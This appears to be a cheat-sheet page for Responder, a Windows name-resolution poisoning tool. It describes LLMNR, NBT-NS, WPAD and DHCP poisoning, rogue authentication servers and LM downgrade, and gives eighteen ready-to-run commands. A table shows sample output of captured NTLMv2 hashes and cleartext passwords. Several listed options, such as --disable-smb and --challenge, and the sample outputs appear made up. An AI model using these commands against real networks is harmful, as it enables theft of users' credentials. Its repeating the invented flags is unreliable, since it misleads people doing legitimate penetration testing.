Responder

Responder is an open-source LLMNR, NBT-NS, and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers. It is one of the most powerful tools for capturing credentials in Windows Active Directory environments. Responder exploits the weaknesses in Windows name resolution protocols to intercept authentication attempts and capture password hashes.

Here are the primary uses of Responder:

LLMNR/NBT-NS Poisoning: Responder poisons Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) queries, causing Windows systems to send authentication credentials to the attacker's machine. This is one of the most effective methods for obtaining credentials in Windows networks.
Credential Harvesting: The tool captures NTLMv1, NTLMv2, and other authentication hashes when Windows systems attempt to authenticate to the rogue servers it creates. These hashes can be cracked offline or used in pass-the-hash attacks.
Man-in-the-Middle Attacks: Responder can perform various man-in-the-middle attacks against Windows authentication mechanisms, intercepting and relaying authentication attempts to capture credentials or gain unauthorized access.
Rogue Server Deployment: Responder deploys multiple rogue authentication servers (HTTP, SMB, MSSQL, FTP, LDAP) that mimic legitimate services, tricking clients into authenticating against them and revealing their credentials.
Active Directory Assessment: Security professionals use Responder during Active Directory penetration tests to identify weak authentication practices, misconfigured systems, and vulnerable network segments where credentials can be easily captured.
Network Reconnaissance: Beyond credential capture, Responder can gather valuable information about network structure, naming conventions, user accounts, and service locations within Windows environments.

Core Features

LLMNR Poisoning
NBT-NS Poisoning
MDNS Poisoning
HTTP Authentication Server
SMB Authentication Server
MSSQL Authentication Server
FTP Authentication Server
LDAP Authentication Server
NTLMv1/v2 Hash Capture
Kerberos Hash Capture
WPAD Proxy Server
Analyze Mode
Fingerprinting
Session Management

Data sources

LLMNR Queries
NBT-NS Queries
MDNS Queries
WPAD Requests
Authentication Attempts
Network Traffic
Password Hashes
User Credentials
Service Requests

Common Responder Commands

1. Basic Execution

This command starts Responder with default settings on the specified network interface. It begins poisoning LLMNR and NBT-NS queries to capture credentials.

responder -I <interface>

2. Analyze Mode

This command runs Responder in analyze mode, monitoring network traffic without performing any poisoning. It's useful for reconnaissance and understanding network behavior before launching attacks.

responder -I <interface> -A

3. Enable WPAD Proxy

This command enables the Web Proxy Auto-Discovery (WPAD) rogue proxy server. It can capture HTTP authentication credentials from browsers and applications using WPAD for proxy configuration.

responder -I <interface> -w

4. Force WPAD Authentication

This command forces WPAD authentication by serving a rogue PAC file that requires authentication. It's particularly effective for capturing credentials from web browsers.

responder -I <interface> -w -F

5. Disable SMB Server

This command disables the SMB authentication server while keeping other services active. It's useful when targeting specific protocols or avoiding detection.

responder -I <interface> --disable-smb

6. Disable HTTP Server

This command disables the HTTP authentication server, focusing poisoning efforts on other protocols like SMB or FTP.

responder -I <interface> --disable-http

7. Enable Fingerprinting

This command enables detailed fingerprinting of connecting hosts, gathering information about operating systems, browser versions, and other client details.

responder -I <interface> -f

8. Verbose Output

This command enables verbose output mode, displaying detailed information about all poisoning attempts, authentication captures, and network activity.

responder -I <interface> -v

9. Specify Log Directory

This command sets a custom directory for storing captured credentials and log files. It helps organize multiple assessment outputs.

responder -I <interface> -o /path/to/logs

10. Listen on All Interfaces

This command makes Responder listen on all available network interfaces simultaneously, useful for systems with multiple network connections.

responder -I all

11. Disable NetBIOS

This command disables NBT-NS poisoning while keeping LLMNR poisoning active. It's useful for targeting specific name resolution protocols.

responder -I <interface> --disable-nbt

12. Enable DHCP Poisoning

This command enables DHCP poisoning to inject malicious DNS server addresses, redirecting name resolution queries to the attacker's system.

responder -I <interface> -d

13. Custom Challenge

This command sets a custom NTLM challenge value instead of random challenges. It's useful for rainbow table attacks or specific testing scenarios.

responder -I <interface> --lm --challenge <challenge>

14. Force LM Downgrade

This command forces LM hash downgrade attacks, attempting to capture weaker LM hashes that are easier to crack than NTLMv2.

responder -I <interface> --lm

15. Run in Background

This command runs Responder as a background process, allowing it to continue capturing credentials while performing other tasks.

responder -I <interface> &

16. Target Specific Domain

This command configures Responder to target a specific Windows domain, focusing poisoning efforts on domain-joined systems.

responder -I <interface> -r <domain>

17. Disable Multicast

This command disables multicast name resolution poisoning, focusing only on broadcast-based NBT-NS queries.

responder -I <interface> --disable-mdns

18. Help and Usage Information

This command displays the help menu and usage information for Responder, listing all available options and attack modes.

responder -h

Alternative usage:

responder --help

Output Examples of Responder Commands

Command| Example Usage| Function| Output Example
---|---|---|---
Basic Execution| responder -I eth0| Starts poisoning on eth0 interface.| [+] Listening for events...
[+] Poisoning LLMNR & NBT-NS
Analyze Mode| responder -I eth0 -A| Monitors without poisoning.| [+] Analyze mode enabled
[*] LLMNR request from 192.168.1.10
WPAD Enabled| responder -I eth0 -w| Enables WPAD proxy server.| [+] WPAD Proxy Server started
[+] Listening on port 3128
Force WPAD Auth| responder -I eth0 -w -F| Forces WPAD authentication.| [+] WPAD forced authentication enabled
Disable SMB| responder -I eth0 --disable-smb| Disables SMB server.| [+] SMB server disabled
Disable HTTP| responder -I eth0 --disable-http| Disables HTTP server.| [+] HTTP server disabled
Fingerprinting| responder -I eth0 -f| Enables host fingerprinting.| [+] Fingerprinting enabled
[*] OS: Windows 10 Pro
Verbose Mode| responder -I eth0 -v| Shows detailed output.| [*] Verbose mode enabled
[*] Sent poisoned answer to 192.168.1.10
Custom Log Dir| responder -I eth0 -o /tmp/logs| Sets custom log directory.| [+] Logs saved to /tmp/logs
NBT-NS Poisoned| responder -I eth0| Captures NBT-NS query.| [NBT-NS] Poisoned answer sent to 192.168.1.10
Requested name: FILESERVER
LLMNR Poisoned| responder -I eth0| Captures LLMNR query.| [LLMNR] Poisoned answer sent to 192.168.1.10
Requested name: SHAREPOINT
SMB Hash Captured| responder -I eth0| Captures SMB NTLMv2 hash.| [SMB] NTLMv2 Client: 192.168.1.10
User: DOMAIN\john
Hash: john::DOMAIN:1122334455667788:...
HTTP Hash Captured| responder -I eth0| Captures HTTP NTLM hash.| [HTTP] NTLMv2 Client: 192.168.1.10
User: admin
Hash: admin:::1122334455667788:...
LDAP Credentials| responder -I eth0| Captures LDAP credentials.| [LDAP] Clear text credentials:
User: administrator
Password: P@ssw0rd123
FTP Hash Captured| responder -I eth0| Captures FTP authentication.| [FTP] NTLMv2 Client: 192.168.1.10
User: ftpuser
Hash: ftpuser::DOMAIN:...
MSSQL Hash| responder -I eth0| Captures MSSQL authentication.| [MSSQL] NTLMv2 Client: 192.168.1.10
User: sa
Hash: sa::DOMAIN:...
Kerberos TGT| responder -I eth0| Captures Kerberos ticket.| [KRB5] TGT captured from 192.168.1.10
User: john@DOMAIN.LOCAL
WPAD Request| responder -I eth0 -w| Captures WPAD request.| [WPAD] Request from 192.168.1.10
User-Agent: Mozilla/5.0
Clear Text Creds| responder -I eth0| Captures plaintext credentials.| [+] Clear text credentials captured:
Username: admin
Password: password123
Disable NBT-NS| responder -I eth0 --disable-nbt| Disables NBT-NS poisoning.| [+] NBT-NS poisoning disabled
LM Downgrade| responder -I eth0 --lm| Forces LM hash capture.| [+] LM downgrade attack enabled
[LM] Hash captured from 192.168.1.10
Custom Challenge| responder -I eth0 --challenge 1122334455667788| Uses custom NTLM challenge.| [+] Using custom challenge: 1122334455667788
DHCP Poisoning| responder -I eth0 -d| Enables DHCP poisoning.| [+] DHCP poisoning enabled
[DHCP] Injected DNS: 192.168.1.100
Session Info| responder -I eth0| Shows session statistics.| [+] Captured 15 hashes
[+] 5 unique users compromised
Startup Banner| responder -I eth0| Shows Responder startup.| _____ _
`

Tools

Core Features​

Data sources​

Common Responder Commands​

1. Basic Execution​

2. Analyze Mode​

3. Enable WPAD Proxy​

4. Force WPAD Authentication​

5. Disable SMB Server​

6. Disable HTTP Server​

7. Enable Fingerprinting​

8. Verbose Output​

9. Specify Log Directory​

10. Listen on All Interfaces​

11. Disable NetBIOS​

12. Enable DHCP Poisoning​

13. Custom Challenge​

14. Force LM Downgrade​

15. Run in Background​

16. Target Specific Domain​

17. Disable Multicast​

18. Help and Usage Information​

Output Examples of Responder Commands​